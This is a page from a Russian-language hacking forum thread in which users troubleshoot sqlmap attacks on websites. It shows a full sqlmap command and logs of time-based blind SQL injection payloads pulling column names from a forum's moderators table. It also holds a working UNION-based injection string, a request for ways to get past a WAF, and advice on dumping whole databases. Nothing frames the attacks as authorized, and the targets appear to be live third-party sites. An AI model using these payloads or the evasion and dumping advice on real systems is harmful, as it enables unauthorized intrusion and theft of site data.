HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 08.12.2016, 18:58
PoliGroS
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  

--time-sec=10 это таймаут, попробуй
--delay=1 это слип в секундах между запросами
а вообще уровень вербозности побольше сделай
-v 4
и посмотри что сервер отвечает
-----------
судя по payload это time-based
как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он
Цитата:
Сообщение от None  
C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1 --delay=1 -v 3
[16:59:47] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[16:59:47] [INFO] resumed: 27
[16:59:47] [DEBUG] performed 0 queries in 0.00 seconds
[16:59:47] [INFO] resuming partial value: mi
[16:59:47] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>64,0,10)))))IowG) AND 'gFNg'='gFNg
[16:59:47] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[17:00:34] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>96,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[17:00:45] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>112,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:46] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[17:00:47] [DEBUG] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request
[17:00:49] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>120,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:50] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>116,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:51] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>114,0,10)))))IowG) AND 'gFNg'='gFNg
Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
 
Ответить с цитированием

  #322  
Старый 08.12.2016, 19:32
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от PoliGroS  

Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
вообще там должен быть код ответа сервера и заголовки, хотя может это при -v 5, не помню точно

"врятли sql запросы могут повесить бд или сам сайт" вот не стоит так заблуждаться)))
 
Ответить с цитированием

  #323  
Старый 12.12.2016, 06:13
She1ter
Новичок
Регистрация: 11.12.2016
Сообщений: 3
Провел на форуме:
800

Репутация: 0
По умолчанию

Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?

получил я такой вывод в sqlmap:

Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#

Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).


Как использовать payload, чтобы увидеть в браузере, что сайт http://test.ru:443/post.php?id=1 подвержен Sql injection?

Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается, не могу понять принцип, может и правильно делаю но мой запрос WAF блокирует?

В итоге сайт возвращает меня на главную страницу http://test.ru:443
 
Ответить с цитированием

  #324  
Старый 19.12.2016, 17:08
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Код:
[12:47:03] [INFO] resumed: 1
[12:47:03] [INFO] retrieving the length of query output
[12:47:03] [INFO] retrieved: 1
[12:47:08] [INFO] retrieved: 1
[12:47:15] [INFO] retrieving the length of query output
[12:47:15] [INFO] retrieved: 16
[12:47:25] [INFO] retrieved: ________________
[12:47:25] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[12:47:30] [INFO] retrieved: ????????????????
[12:47:30] [INFO] retrieving the length of query output
[12:47:30] [INFO] retrieved: 2
[12:47:38] [INFO] retrieved: ??
[12:47:38] [INFO] retrieving the length of query output
[12:47:38] [INFO] retrieved: 128
[12:48:27] [INFO] retrieved: ???????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????
начинаю дамп вроде все норм потом ошибка [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid

ation step in similar cases

и пошли вопросы(в чем может быть проблема?
 
Ответить с цитированием

  #325  
Старый 19.12.2016, 17:13
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от She1ter  

Друзья, подскажите плиз, не пойму как использовать Payload из sqlmap для создания sql запросов непосредственно в браузере?
получил я такой вывод в sqlmap:
Payload: id=-3918') UNION ALL SELECT 65,CONCAT(0x71716b7871,0x6248786b594f4d766a4545694 f4b61685547556765656e697254686d7a49424c716c54736a6 f6970,0x717a627a71)#

Инъекция обнаружена, с помощью sqlmap вижу базу, таблицы и колонки (но не все).

Как использовать payload, чтобы увидеть в браузере, что сайт
http://test.ru:443/post.php?id=1
подвержен Sql injection?
Пробовал подставлять вместо id=1 значение id=-3918'), ничего не получается,
не могу понять принцип
, может и правильно делаю но мой запрос WAF блокирует?
В итоге сайт возвращает меня на главную страницу
http://test.ru:443
К коментарии для кого ?

А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400

п.с во всех бедах винить waf , разумно очень.

brown, на скрине не увидел ничего нормального, 406 - Waf
 
Ответить с цитированием

  #326  
Старый 20.12.2016, 16:51
She1ter
Новичок
Регистрация: 11.12.2016
Сообщений: 3
Провел на форуме:
800

Репутация: 0
По умолчанию

Burp не пробовал, но разобрался, действительно синтаксис:-(

Id=-1') -- -

Спасибо
 
Ответить с цитированием

  #327  
Старый 20.12.2016, 20:52
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  

К коментарии для кого ?
А вы пробовали в бурпе, вывод может быть и в ошибке, например 500. Надо через бурпсмотреть, почему редирект, скорее всего синтекс хромает, или условие не верное. Причин +100400
п.с во всех бедах винить waf , разумно очень.
brown
, на скрине не увидел ничего нормального, 406 - Waf
а как обойти?есть темперы под это?
 
Ответить с цитированием

  #328  
Старый 21.12.2016, 08:26
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Подскажите как сдеать дамп в sql файл?

А то csv немножко не то

Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin
 
Ответить с цитированием

  #329  
Старый 21.12.2016, 09:48
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Цитата:
Сообщение от kacergei  

Подскажите как сдеать дамп в sql файл?
А то csv немножко не то
Может можно как то сделать дамп всей БД в sql файл и импортировать в последствии в phpMyAdmin
как в sql не знаю но может поможет,--dump-format=HTML

А вообще cvs в xls и xls импортируешь в sql
 
Ответить с цитированием

  #330  
Старый 21.12.2016, 10:04
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от brown  

как в sql не знаю но может поможет,--dump-format=HTML
А вообще cvs в xls и xls импортируешь в sql
Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.